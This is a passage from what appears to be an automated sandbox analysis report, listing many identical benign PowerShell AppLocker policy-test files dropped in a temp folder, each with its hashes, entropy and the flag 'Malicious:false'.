                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktjpsecp.b4e.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le4f5j1y.bko.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh0fhju0.4ua.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_linxqh0i.mo3.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mehvdlzk.42l.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlnmjmth.n0g.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mowuwuz0.5ek.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjwf10c.1hs.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ob0hxa24.js4.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogdi4egq.xva.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pcpxfbf5.bp1.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phj4pjis.dyz.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qflvguqn.lxw.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql1sp0bp.x4j.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoshhzvk.dnz.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwl1tt01.cq4.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzucdb0v.np5.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r10mdqpw.hvu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3jwa5fe.cfk.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rovxelcv.ldd.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ru4rsudl.r3c.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwqecabb.2rj.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shc32mdo.by5.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqermsom.31i.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4usq10s.c2o.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tacb14ca.0ku.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te0pyar0.cxp.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tul4lbev.skn.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubqlvpit.2l1.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

